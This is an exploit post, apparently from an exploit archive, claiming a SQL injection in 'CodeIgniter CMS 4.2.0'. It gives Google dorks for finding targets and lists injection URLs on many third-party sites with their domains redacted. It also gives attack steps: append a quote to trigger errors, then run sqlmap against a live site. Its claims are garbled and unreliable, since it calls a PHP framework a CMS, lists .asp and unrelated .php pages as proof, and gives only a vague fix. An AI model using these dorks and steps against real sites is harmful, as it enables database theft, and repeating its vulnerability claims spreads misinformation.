توییت
Risk: Medium
Remote: Yes
CWE: CWE-89
Remote: Yes
CWE: CWE-89
کد:
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+]Exploit Title : CodeIgniter CMS Version 4.2.0 Sql Injection Vulnerability [+] [+]Exploit Author : E1.Coders [+] [+]Vendor Homepage : https://www.codeigniter.com/ [+] [+]Google Dork ONE : searchResult/?title= [+] [+]Google Dork Two : Job/searchResult/?title= [+] [+]Date : 15 / 05 / 2022 [+] [+]Tested On : windows + linux [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>DESCRITION <~ ~ ~ [+] [+] CodeIgniter CMS suffers from a remote SQL injection vulnerability. [+] "codeigniter vulnerability ::$DATA view source code" [+] Note that this find contains information about the site. [+] CodeIgniter CMS SQL injection vulnerabilities were found and confirmed in the software as an anonymous user. [+] A successful attack could allow an unknown attacker to access information such as username and password hashes stored in the database. [+] The following URLs and parameters have been confirmed to suffer from SQL injection. [+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~> Location <~ ~ ~ [+] SQL ERROR Location [+] http://www.site.com/Job/searchResult/?title=[SQL] [+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~ ~~ ~> DEMO <~ ~ ~ [+] [+] [+] ERROR : https://[removed].com/Job/searchResult/?title=123%27 [+] [+] ERROR : https://[removed].com/Job/city/%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85-%D9%85%D8%B4%D9%87%D8%AF' (OR= or ==) [+] [+] ERROR : https://[removed].ir/?per_page=400%2 [+] [+] ERROR : https://[removed].ir/Job/search/NULL/%D8%A2%D8%A8%D8%A7%D8%AF%D8%A7%D9%86'/NULL/NULL/0 [+] [+] ERROR : https://[removed].com/login/ (username = ' Password = ') [+] [+] ERROR : https://[removed].com/search.php?search=1' [+] [+] ERROR : https://[removed].com/news.php?p=7251' [+] [+] ERROR : https://[removed].com/employe/show.php?cvid=14088' [+] [+] ERROR : https://[removed].com/states/%D8%AA%D9%87%D8%B1%D8%A7%D9%86' [+] [+] ERROR : https://[removed].com/fa/index.asp?p=search&search=1 [+] [+] ERROR : https://[removed].com/fa/FormView/1026' [+] [+] ERROR : https://[removed].com/fa/formview/1030' [+] And Google More . . . \ . [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Methode Attack : [+] [+] Step 1 : Enter the URL of the page that has the problem of sql injection attacks [+] [+] Step 2 : Add a variable " OR ' to the end of the URL "request" [+] To display the PHP error related to not controlling the functions that cause the attacker to attack ' [+] [+] Step 3 : Use sqlmap: python sqlmap.py -u "https://[removed].com/Job/searchResult/?title=123" [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] About CMS : [+] [+] Codeigniter is an open source web software framework used to build dynamic websites. [+] This framework, which is written in PHP language, [+] accelerates the development of software by coding from the beginning. This acceleration is done by the framework's libraries, [+] many of which make common tasks simple. The first public release of CodeIgniter was on February 28, 2006 [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Explanation of vulnerability : [+] [+] The remote attacker can test the SQL Inject attack by injecting a 'variable' and after displaying the PHP error related to not controlling the functions that cause the SQL Inject attack [+] And the attacker can execute attacks with SQL Inject commands or execute attacks with ready tools such as Squat Map. [+] [+] All different parts of the site have this security problem [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Solution : [+] [+] [+] Use parameter input validation to be modified to prevent attacks [+] "codeigniter vulnerability ::$DATA view source code" [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]